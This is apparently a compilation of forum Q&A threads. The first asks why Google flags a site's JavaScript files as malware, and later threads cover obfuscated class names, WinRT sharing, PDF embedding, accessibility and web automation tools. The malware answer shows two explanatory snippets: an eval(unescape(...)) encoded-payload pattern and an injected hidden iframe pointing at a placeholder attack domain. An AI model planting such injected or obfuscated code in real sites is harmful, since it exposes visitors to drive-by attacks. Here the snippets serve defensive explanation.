When does Google mark a file as malware? - malware

I have a couple of JS files, including jQuery, on my website.
Google says:
The last time Google tested a site on this network was on 2013-02-14, and the last time suspicious content was found was on 2013-02-14.
Do you have any idea under what conditions Google may detect malware in JS files? Is it a problem with the code itself, or malware injected into the files?

Sorry for the vague answer, but without more details I can't be more specific. In general, there are certain patterns and code techniques commonly used by malware to overflow buffers in browsers, giving the attacker control of the system. The JavaScript itself is just used as a conduit to the browser. Often, shellcode bytes are encoded into JavaScript for delivery to an unsuspecting user's browser. If you have encoded data being delivered through JavaScript, it may appear suspicious to Google's heuristics engine.
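As a purely illustrative (and harmless) sketch, the snippet below mimics the shape of encoded-payload delivery that heuristic scanners look for: an escaped blob decoded at runtime and handed to eval, hiding the real content from static inspection. Legitimate code that does something similar can trip the same heuristics.

    // Hypothetical illustration only: this is the *shape* of code that heuristic
    // scanners flag, not actual malware. An escaped blob is decoded at runtime
    // and passed to eval(), so a static scan never sees the real payload.
    var blob = "%61%6C%65%72%74%28%31%29"; // decodes to: alert(1)
    eval(unescape(blob));                  // dynamic execution of decoded content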
It is also possible that you are using techniques similar to those of malicious scripts (the kind used for cross-site scripting (XSS) and cross-site request forgery (CSRF)) to accomplish some of your work, and this is a good way to get flagged by Google.
Another possibility is that your website code is fine, but it has a security hole that concerns Google because a malicious user could exploit your site. To determine this, I recommend using a web scanner such as Nikto, Burp Suite (my personal favorite), or Acunetix to try to find security holes.
You can also find a lot of great info at OWASP.
I hope this helps, as having your site flagged by Google can cause a lot of frustration and anxiety. Good luck!

If Google says they found malicious (or suspicious) code in your files, there is malicious or suspicious code in your files.
Sorry, but Google doesn't scan for vulnerabilities - it only detects bad code already present on your site. Without knowing more about your website, operating system, software, etc., it's impossible to give you more information on how it happened.
If they detected it in your .js files, you may have a document.write statement at either the very beginning or the very end of those files. The problem for you is that even if you find and remove the injected code, you still don't know how it got there. Without knowing that and taking steps to prevent it, it will return.
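For reference, a typical injection of this kind looks something like the line below, appended to the end of a legitimate .js file (the domain is a made-up placeholder, not a real host):

    // Hypothetical example of the kind of line attackers append to a legitimate
    // .js file: an invisible iframe pointing at an attack page. Placeholder domain.
    document.write('<iframe src="http://bad-example.invalid/x.html" width="1" height="1" style="visibility:hidden"></iframe>');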

Related

Why does Google obscure HTML/CSS classes on Google+?

Attached is a screenshot of Chrome Developer Tools looking at the Google+ HTML; note the seemingly random class names.
The sources of unreadable identifiers can be:
minification
obfuscation
random ID generation
Google+ is probably implemented as a GWT (or similar framework) application with minified resources (JavaScript and CSS files) and automatically generated identifiers. Minification is also widely used as a tool for obfuscating code, so the unreadability is partly intentional too.
Obfuscation can be used to reduce code size, as well as to reduce readability for an "unauthorized" user, making it harder to reverse-engineer a product or steal ideas. Someone asked a pretty similar question here; that should answer any further questions you have.
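To illustrate the minification point: a JavaScript minifier rewrites readable identifiers into the shortest names available, and frameworks like GWT can additionally obfuscate CSS class names, which ordinary minifiers leave alone. A sketch of the transformation (all names invented for illustration):

    // Before: readable, self-documenting source.
    function togglePostComments(postElement) {
      postElement.classList.toggle("comments-expanded");
    }

    // After minification (plus GWT-style CSS class obfuscation), the same
    // code might be emitted as something like:
    // function a(b){b.classList.toggle("Xf-c9")}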

Share a "deep link" from a Windows 8/WinRT application

I have searched using many different terms and phrases, and waded through many pages of results, but I have (remarkably) not seen anyone else addressing, or even asking about, this issue. So here goes...
Ultimate Goal: Allow a user viewing a content-based page (may contain both text and images) within a Windows Store app to share that content with someone else.
Description
I am working on taking a fair amount of content and making it available for browsing/navigating as a Windows 8/WinRT/Windows Store (we need a consistent name here) application. One of the desired features is to take advantage of the Share Charm, such that someone viewing a page could share that page with someone else.
The ideal behavior is for the application to implement the Share Source contract which would share an email message that contained some explanatory text, a link to get the app from the Windows Store, and a "deep link" into the shared page in the application.
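For reference, a minimal sketch of the Share Source side in an HTML/JS app looks like this (the deep-link URI scheme and page id are hypothetical placeholders; resolving such a URI back into the app is exactly the open problem described below):

    // Minimal Share Source sketch for a WinJS (HTML/JS) app. The deep-link
    // scheme "my-special-app:" and the page id are hypothetical placeholders.
    var dtm = Windows.ApplicationModel.DataTransfer.DataTransferManager.getForCurrentView();
    dtm.addEventListener("datarequested", function (e) {
        var request = e.request;
        request.data.properties.title = "Shared page";
        request.data.properties.description = "A page from our app";
        // Share a URI; the receiving side still needs a way to resolve it
        // back into the application, which is the crux of the question.
        request.data.setUri(new Windows.Foundation.Uri("my-special-app:page/42"));
    });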
Solutions Considered
We had originally looked at just generating a PDF representation of the page, but there are very few external libraries that would work under WinRT, and having to include externally licensed code would be problematic as well. Writing our own PDF generation code would be out of scope.
We have also considered generating a Word document or PowerPoint slide using OpenXML, but again, we run up against the limitations of WinRT. In this case, it is highly unlikely the OpenXML SDK is usable in a WinRT application.
Another thought was to pre-generate all of the pages as .pdf files, store them as resources, and, when the Share Charm is invoked, share the .pdf file associated with the current page. The problem here is that the application will have at least 150 content pages, and depending on how we break the content down, more than 600. This would likely cause serious bloat.
Where We Are At
Thus we have come to sharing URIs. From what I can tell, though, the "deep linking" feature is only intended for use on Secondary Tiles tied to your application. Another avenue I considered was registering a protocol like "my-special-app:" with the OS and having it fire up the application, but that would require HKCR registry access, which is outside the WinRT sandbox.
If it matters, we are leaning towards an HTML/JS application, rather than XAML/C#, because the converted content will all be in HTML and the WebView control in WinRT is fairly limited. This decision is not yet final, though.
Conclusion
So, is this possible, and if so, how would it be done or where can I find documentation on it?
Thanks,
Dave Parker

Embedding PDF on website - without uploading to other service

On our site we use Google's document viewer to let users view PDFs and other documents in the browser. But Google's viewer is not very good when used outside Google's own services: quite often it doesn't show anything at all, and the size limit for PDF files is around 10-20 MB. The main issue is that it frequently just fails to show files.
So we're looking for a way to show PDFs (and other documents) on our site. It would be great if it could be done without us having to upload them to another service, as this complicates the process.
Pricing is not an issue, so even if you only know of an expensive service, it would be great to hear about it.
And if anyone has other solutions, it would be great to hear about those too.
Thanks,
Tobias
Through another source it was suggested that we use Scribd, and our first tests show that it works great. The documentation is good-ish, so it's easy enough to set up.
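For anyone who still wants to avoid a third-party service entirely, most browsers can render self-hosted PDFs natively. A minimal sketch (the file path and container id are hypothetical):

    // Minimal sketch of self-hosted PDF embedding, relying on the browser's
    // built-in PDF support. The path and container id are hypothetical.
    var viewer = document.createElement("object");
    viewer.data = "/docs/report.pdf";
    viewer.type = "application/pdf";
    viewer.width = "100%";
    viewer.height = "600";
    // Fallback content for browsers without inline PDF support:
    viewer.innerHTML = '<a href="/docs/report.pdf">Download the PDF</a>';
    document.getElementById("pdf-container").appendChild(viewer);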

How does JavaScript use affect 508 Compliance?

As background, I currently develop for a university, and we have trouble reconciling departments' demands for "web 2.0 content" with accessibility requirements.
How do really big sites that are JavaScript-based deal with 508 Compliance? Some sites degrade gracefully, and others require enabling JavaScript. How much impact does one decision have versus the other?
Also, realistically, how much development time should be devoted to the accessible versions of sites versus the "main" versions?
I'm a blind developer and find many Web 2.0 sites usable - making them accessible is most certainly possible.
Firstly, I strongly advise against making a separate accessible site, regardless of how many people advise you to do this. This is bad practice and will end up being more work, even if it initially seems simpler.
Next, try to use progressive enhancement (particularly if this is a new site). Code the site without any JavaScript; accessibility isn't the only thing that benefits. Then, in your onload handler, go through and attach click events to the anchor tags; this way, users with JavaScript get the Ajax version, while everyone else gets a full page refresh to another HTML page, as sketched below.
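A minimal sketch of that pattern (the "ajax-nav" class and the loadPanel() Ajax helper are hypothetical):

    // Progressive enhancement: the anchors work as ordinary links without
    // JavaScript; with it, we intercept the click and load content via Ajax.
    window.onload = function () {
      var links = document.querySelectorAll("a.ajax-nav");
      for (var i = 0; i < links.length; i++) {
        links[i].addEventListener("click", function (e) {
          e.preventDefault();     // suppress the full page refresh
          loadPanel(this.href);   // hypothetical Ajax loader for the same URL
        });
      }
    };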
Luckily, there is a newer standard, WAI-ARIA (www.w3.org/WAI/intro/aria.php), which makes this much simpler. You attach attributes to HTML tags to identify the semantics of an Ajax control, for example. The only problem with ARIA is that it only works with newer screen readers and web browsers. The university may well require the site to be accessible to people running older software.
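For example, an Ajax-driven disclosure widget can be annotated so screen readers announce its role and state (the element ids here are hypothetical):

    // Sketch: adding WAI-ARIA attributes to an Ajax disclosure widget.
    var toggle = document.getElementById("courses-toggle");
    toggle.setAttribute("role", "button");
    toggle.setAttribute("aria-expanded", "false");
    toggle.setAttribute("aria-controls", "courses-panel");

    var panel = document.getElementById("courses-panel");
    panel.setAttribute("role", "region");
    panel.setAttribute("aria-live", "polite"); // announce content updates politely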
I'm a screen reader user and often use JavaScript-enabled sites. JavaScript itself is not an accessibility issue; the way it is used can be. For example, if a site uses JavaScript that requires a mouse and doesn't offer keyboard alternatives, it will not be 508 compliant. An example of a site that uses JavaScript and is accessible is stackoverflow.com; the only feature that isn't accessible is the ability to determine whether you have accepted an answer to a question. I would take a look at the links in Annie's answer. All the blind college students I know use a fairly modern browser with JavaScript enabled; Lynx is no longer popular in the blind community. If you want to try using a screen reader, a good open source one for Windows can be found at
http://www.nvda-project.org/
and it works well with Firefox. If you want to try using the web without JavaScript, install the NoScript add-on.
Sites don't have to disable JavaScript to be accessible. Many sites use ARIA roles to work better with screen readers. There's a giant list of articles on accessible AJAX applications here. You could try something like AxsJAX.

Is there an equivalent of Don Libes's *expect* tool for scripting interaction with web pages?

In the bad old days of interactive console applications, Don Libes created a tool called Expect, which enabled you to write Tcl scripts that interacted with these applications, much as a user would. Expect had two tremendous benefits:
It was possible to script interactions that otherwise would have had to be repeated by hand, tediously. A classic example was dialup Internet access hell (from the days before PPP).
It was possible to write scripts to test one's own interactive applications, programmatically, as part of a regression suite.
Today most interactive applications are on the web, not on the console. Hence my question: is there any tool that provides the ability to interact with web pages and web forms programmatically, much as Expect provides the ability to interact with console applications programmatically?
(The closest thing I am aware of is Chickenfoot.)
You might be looking for Selenium.
I've used Selenium RC in conjunction with Python to drive web page interactions programmatically. This has allowed me to write pretty extensive user tests in which forms and inputs are driven and their results are measured.
Check out the Selenium IDE on Firefox (as mentioned above). It allows you to record tests in the browser and play them back, either using the IDE itself, or the Remote Control app.
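If you would rather drive the browser from code than from the IDE, here is a minimal sketch using the newer selenium-webdriver Node bindings (not the Selenium RC client mentioned above); the URL, field names, and page title are made-up placeholders:

    // Sketch: logging into a hypothetical site and waiting for the result.
    const { Builder, By, until } = require("selenium-webdriver");

    (async function run() {
      const driver = await new Builder().forBrowser("firefox").build();
      try {
        await driver.get("http://example.com/login");
        await driver.findElement(By.name("username")).sendKeys("testuser");
        await driver.findElement(By.name("password")).sendKeys("secret");
        await driver.findElement(By.css("button[type=submit]")).click();
        await driver.wait(until.titleContains("Dashboard"), 5000);
      } finally {
        await driver.quit(); // always shut the browser down
      }
    })();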
Perl Mechanize works pretty well for this exact issue.
HTTPS and some authentication issues are tricky at times. I will be posting a couple of questions about those in the future.
I did a ton of Expect work in a former life and always thought Don Libes' Expect book was one of the best-written and most enlightening technical books I'd ever seen.
Hands down, I would say that Perl's WWW::Mechanize library is what you want. I note above that you were having trouble finding documentation: there is good documentation for it! Look up the module's distribution on search.cpan.org and see everything that's packaged with it. There's a FAQ, a Cookbook with examples, etc. Plus, I've always been able to get help on the web. If you can't get it here, try use.perl.org or perlmonks.org. WWW::Mechanize's author, Andy Lester, is present on Stack Overflow. (He's also an all-around friendly and helpful guy.)
I believe WWW::Mechanize also has a program analogous to Expect's autoexpect: you set up a proxy process running this program as a server, point your browser at it as a proxy, perform the actions you want to automate, and the proxy then gives you a WWW::Mechanize script to use as a base for your project. (If it works like autoexpect, you will certainly want to make modifications from there.)
As mentioned above, WWW::Mechanize is a browser (more precisely, a web or HTTP client) that happens to be programmable. The last time I looked, there was even work in progress to make it support JavaScript.
In addition to Selenium, if you're doing the Ruby/Rails thing, there's Webrat.